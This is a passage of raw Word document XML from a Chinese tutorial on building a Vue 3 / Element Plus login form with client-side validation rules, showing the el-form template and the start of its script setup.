    <w:p w14:paraId="2A6BE32C" w14:textId="77777777" w:rsidR="007D6AA2" w:rsidRDefault="007D6AA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007D6AA2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E881D51" w14:textId="07F6C8AF" w:rsidR="00B13BBD" w:rsidRDefault="007D6AA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8D41D5" w14:textId="77777777" w:rsidR="003D73B1" w:rsidRDefault="003D73B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E39F81A" w14:textId="707AFAE8" w:rsidR="005210D4" w:rsidRDefault="00874EE9" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="692" w:name="_Toc159780122"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录表单验证处理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="692"/>
    </w:p>
    <w:p w14:paraId="5A918CFD" w14:textId="123E0631" w:rsidR="00874EE9" w:rsidRDefault="00874EE9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>想让表单提交时，先自行检查有没有输入正确的参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392337CF" w14:textId="45EAC4ED" w:rsidR="003D73B1" w:rsidRDefault="00874EE9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1720D938" w14:textId="5F08348D" w:rsidR="003D73B1" w:rsidRDefault="00874EE9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00874EE9">
        <w:t>https://element-plus.org/zh-CN/component/form.html#%E8%A1%A8%E5%8D%95%E6%A0%A1%E9%AA%8C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6239E4BA" w14:textId="77777777" w:rsidR="003D73B1" w:rsidRDefault="003D73B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="620893ED" w14:textId="3E88193B" w:rsidR="003D73B1" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>首先看表单部分，定义</w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>rules</w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>rules</w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>（随后在</w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>中写</w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>rules</w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的校验规则）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>。默认输入的字符串等不够的话，会触发校验提示（但是仅是提示，依然需要点击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>按钮”</w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的时候，回调函数再次校验）。最终我们在的</w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ref</w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>="formRef"</w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的时候，触发</w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>submit</w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的校验</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDA4BF1" w14:textId="77777777" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;el-form</w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ref="formRef"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> :model="form" </w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:rules="rules"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> class="w-[250px]"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A04B4B" w14:textId="77777777" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;el-form-item prop="username"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B756811" w14:textId="77777777" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    &lt;el-input v-model="form.username" placeholder="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请输入用户名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12263CA1" w14:textId="77777777" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                        &lt;template #prefix&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF0A80E" w14:textId="77777777" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                            &lt;el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6C0A70" w14:textId="77777777" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                &lt;User /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D92D01" w14:textId="77777777" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                            &lt;/el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A02954" w14:textId="77777777" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                        &lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325E2435" w14:textId="77777777" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    &lt;/el-input&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609FC18F" w14:textId="77777777" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;/el-form-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD1845E" w14:textId="77777777" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FD00494" w14:textId="77777777" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;el-form-item prop="password"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4C9A7A" w14:textId="77777777" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    &lt;el-input v-model="form.password" placeholder="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请输入密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" type="password" :prefix-icon="Lock"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CF05B2" w14:textId="77777777" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                        &lt;template #prefix&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1A7386" w14:textId="77777777" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                            &lt;el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCED13D" w14:textId="77777777" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                &lt;Lock /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023E1124" w14:textId="77777777" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                            &lt;/el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22244ED9" w14:textId="77777777" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                        &lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F19A39" w14:textId="77777777" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    &lt;/el-input&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B660D1" w14:textId="77777777" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;/el-form-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FACD8D0" w14:textId="77777777" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="550687D1" w14:textId="77777777" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;el-form-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769543A6" w14:textId="77777777" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    &lt;el-button round class="w-[250px]" type="primary" @click="onSubmit"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;/el-button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575138A1" w14:textId="77777777" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;/el-form-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1FDB90" w14:textId="61F6661B" w:rsidR="003D73B1" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;/el-form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273715CE" w14:textId="77777777" w:rsidR="003D73B1" w:rsidRDefault="003D73B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="074C484C" w14:textId="77777777" w:rsidR="003D73B1" w:rsidRDefault="003D73B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="147E3187" w14:textId="531C5B45" w:rsidR="003D73B1" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>部分</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497E237F" w14:textId="10B75DAE" w:rsidR="00716278" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>const</w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> form </w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>是声明表单参数的，有</w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> username</w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3307B381" w14:textId="77777777" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33630822" w14:textId="77777777" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;script setup&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793BD6F7" w14:textId="77777777" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import { ref, reactive } from 'vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B2C10A" w14:textId="77777777" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>// import { User, Lock } from '@element-plus/icons-vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA4411F" w14:textId="77777777" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B632DB6" w14:textId="77777777" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>// do not use same name with ref</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC87F3B" w14:textId="7BE02890" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C94676">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94676">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">/ </w:t>
      </w:r>
      <w:r w:rsidRPr="00C94676">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>声明表单参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DD64DF" w14:textId="77777777" w:rsidR="00716278" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>const form = reactive({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2673C356" w14:textId="77777777" w:rsidR="00716278" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    username: "",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42198BB0" w14:textId="77777777" w:rsidR="00716278" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    password: ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6910C9C8" w14:textId="77777777" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4419FE9C" w14:textId="77777777" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08AE3F28" w14:textId="4BBC52B5" w:rsidR="00C94676" w:rsidRPr="00C94676" w:rsidRDefault="00C94676" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C94676">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94676">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94676">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>指定规则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3449714D" w14:textId="77777777" w:rsidR="00716278" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>const rules = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008C6D85" w14:textId="77777777" w:rsidR="00716278" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    username: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265232ED" w14:textId="77777777" w:rsidR="00716278" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A787D00" w14:textId="77777777" w:rsidR="00716278" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            required: true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B60323E" w14:textId="77777777" w:rsidR="00716278" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            message: '</w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>用户名不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74745062" w14:textId="77777777" w:rsidR="00716278" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            trigger: 'blur'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3CB3F7" w14:textId="77777777" w:rsidR="00716278" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD0E805" w14:textId="77777777" w:rsidR="00716278" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
